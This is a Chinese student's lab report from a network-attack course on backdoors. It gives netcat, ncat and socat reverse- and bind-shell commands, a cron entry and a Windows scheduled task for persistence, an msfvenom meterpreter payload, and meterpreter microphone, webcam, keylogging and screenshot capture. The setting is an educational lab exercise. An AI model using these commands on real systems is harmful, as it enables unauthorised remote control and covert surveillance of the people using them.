天天看點

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

20155302《網絡對抗》後門原理與實踐

實驗要求

1.使用netcat擷取主機操作Shell,cron啟動 (0.5分)


2.使用socat擷取主機操作Shell, 任務計劃啟動 (0.5分)


3.使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機并運作擷取主機Shell(0.5分)


4.使用MSF meterpreter(或其他軟體)生成擷取目标主機音頻、攝像頭、擊鍵記錄等内容,并嘗試提權 (2分)


5.可選加分内容:使用MSF生成shellcode,注入到實踐1中的pwn1中,擷取反彈連接配接Shell(1分)加分内容一并寫入本實驗報告
           

實驗内容

•使用nc實作win,mac,Linux間的後門連接配接


•meterpreter的應用


•MSF POST 子產品的應用
           

實驗過程(基本後門工具實踐)

1.Windows獲得Linux Shell

在windows下,打開CMD,使用

ipconfig

指令檢視本機IP

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

在Linux下,打開終端,使用

ifconfig

指令檢視虛拟機IP

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

去老師給的連結下下載下傳解壓ncat壓縮包,在cmd中進入ncat檔案夾中,使用

ncat.exe -l -p 5302

指令運作ncat.exe監聽5302端口。

在kali端,使用nc指令的-e選項,

nc windows_ip 5302(所設定的端口) -e /bin/sh

反向連接配接Windows主機的5302端口。

連接配接成功後就可以在Win的cmd視窗中輸入Linux的指令,此時已經擷取了Linux的shell。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

2.Linux獲得Win shell

Linux中使用nc指令,

nc -l -p 5302

,監聽5302端口。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

Windows反彈連接配接Linux使用

ncat.exe -e cmd.exe ip_of_linux 5302

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

然後,在kali端,就可以使用windows的cmd了。

3.使用netcat擷取主機操作Shell,cron啟動

在Windows中使用

ncat.exe -l 5302

指令監聽5302端口。

Linux在終端視窗使用``

nc Win的IP 端口号

指令去連接配接Win的5302端口。

crontab -e

指令編輯一條定時任務(輸入3,選vim.basic)

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

添加一行:

20 * * * * /bin/netcat 172.30.1.130 5302 -e /bin/sh

,(該指令是在每個小時的第20分鐘執行後面的指令)儲存并退出,配置生效,可以通過crontab -l來檢視。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

到達你所設定的時間後,你就可以獲得了kali的shell并控制它。

4.使用socat擷取主機操作Shell, 任務計劃啟動

首先去老師的附件中下載下傳socat。

在Windows系統下,打開控制台->管理工具->任務計劃程式,建立任務,填寫任務名稱後,建立一個觸發器。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

在操作中的程式或腳本裡選擇下載下傳的socat.exe的路徑,添加參數中填入

tcp-listen:5302 exec:cmd.exe,pty,stderr

,該指令把cmd綁定到5302端口,同時把cmd的Stderr複位到stdout。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

任務建立後,右鍵它使任務運作。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

然後在Kali環境下輸入指令

socat - tcp:172.30.1.130:5302

,這裡的第一個參數-代表标準的輸入輸出,第二個流連接配接到Windows主機的5302端口,此時可以發現已經成功獲得了一個cmd shell。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

5. 使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機并運作擷取主機Shell

首先在kali裡面輸入

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=5302 -f exe > 20155302.exe

生成後門程式(LHOST=kali linux的IP)

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

通過nc指令将生成的後門程式傳送到Windows主機上

windows:

ncat.exe -l 5302 > 20155302.exe

kali:

nc 172.30.1.130 5302 < 20155302.exe

再在Kali上使用msfconsole指令進入msf控制台,使用監聽子產品,設定payload,設定反彈回連的IP和端口。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

設定完成後,利用exploit,執行監聽,在windows中,利用

20155302.exe

運作2015302.exe。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

此時Kali上已經獲得了Windows主機的連接配接,并且得到了遠端控制的shell。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

6.使用MSF meterpreter生成擷取目标主機音頻、攝像頭、擊鍵記錄等内容,并嘗試提權

1.使用record_mic指令可以截獲一段音頻

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

2.用webcam_snap指令可以使用攝像頭進行拍照

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐
20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

3.使用webcam_stream指令可以使用攝像頭進行錄像

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

4.使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

5.使用screenshot指令可以進行截屏

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

6.使用getuid指令檢視目前使用者,使用getsystem指令進行提權。但是由于環境問題顯示提權失敗,不知道為什麼。

20155302 Exp2 後門原理與實踐20155302《網絡對抗》後門原理與實踐

基礎問題回答

(1)例舉你能想到的一個後門進入到你系統中的可能方式?

答:下載下傳并安裝某個程式,這個程式可以正常的并且完整的為我們提供服務,但是在開發改程式時可能會設計了一個後門,我們安裝程式的過程中也将該後門也裝入了我們的系統中。

2.例舉你知道的後門如何啟動起來(win及linux)的方式?

答:windows:實驗中做過的方式有直接輕按兩下開啟後門程式、通過Windows->控制台->管理工具啟動任務計劃程式、開機自啟動的後門、和其他程式捆綁運作的後門程式

linux:通過在cron中添加任務,定時執行、通過一些腳本啟動後門程式、通過和其他程式捆綁運作後門程式。
           

(3)Meterpreter有哪些給你映像深刻的功能?

控制靶機的攝像頭啦當然是,使用這個可以時時知道對面在幹什麼,還可以偷拍。。。雖然不是很正經,但是覺得很有趣很有用。。

(4)如何發現自己有系統有沒有被安裝後門?

1.使用專殺木馬的軟體

2.關閉本機不用的端口或隻允許指定的端口通路

實驗總結與體會

這次實驗是真滴很有趣,雖然實用性不是很大,因為有現代先進的防毒軟體的存在,但是學會了一些基本原理以及當黑客的快感,第一次覺得自己學的真的是資訊安全了。

轉載于:https://www.cnblogs.com/STILLlover521/p/8684430.html

繼續閱讀